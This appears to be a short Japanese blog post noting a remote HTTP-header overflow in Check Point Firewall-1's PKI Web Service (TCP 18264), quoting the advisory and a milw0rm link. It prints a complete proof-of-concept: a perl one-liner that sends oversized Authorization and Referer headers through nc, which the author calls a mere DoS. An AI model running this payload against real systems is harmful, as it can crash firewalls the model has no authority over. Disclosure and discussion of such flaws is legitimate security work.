Check Point Firewall-1 PKI Web Service HTTP Header Remote Overflow(情報元のブックマーク数)

IT セキュリティ

FireWall-1のPKI Web Serviceというのに脆弱性が存在して長いHTTPヘッダによってオーバーフローが発生するとのこと。

  • Description The Check Point Firewall-1 PKI Web Service, running by default on TCP port 18264, is vulnerable to a remote overflow in the handling of very long HTTP headers. This was discovered during a pen-test where the client would not allow further analysis and would not provide the full product/version info. Initial testing indicates the 'Authorization' and 'Referer' headers were vulnerable.
http://www.milw0rm.com/exploits/8313

ちょっ!このPoC、DoSじゃねーかwww

PoC

perl -e 'print "GET / HTTP/1.0\r\nAuthorization: Basic" . "x" x 8192 .
"\r\nFrom: bugs@hugs.com\r\nIf-Modified-Since: Fri, 13 Dec 2006
09:12:58 GMT\r\nReferer: http://www.owasp.org/" . "x" x 8192 .
"\r\nUserAgent: FsckResponsibleDisclosure 1.0\r\n\r\n"' | nc
suckit.com 18264

http://www.milw0rm.com/exploits/8313

screenshot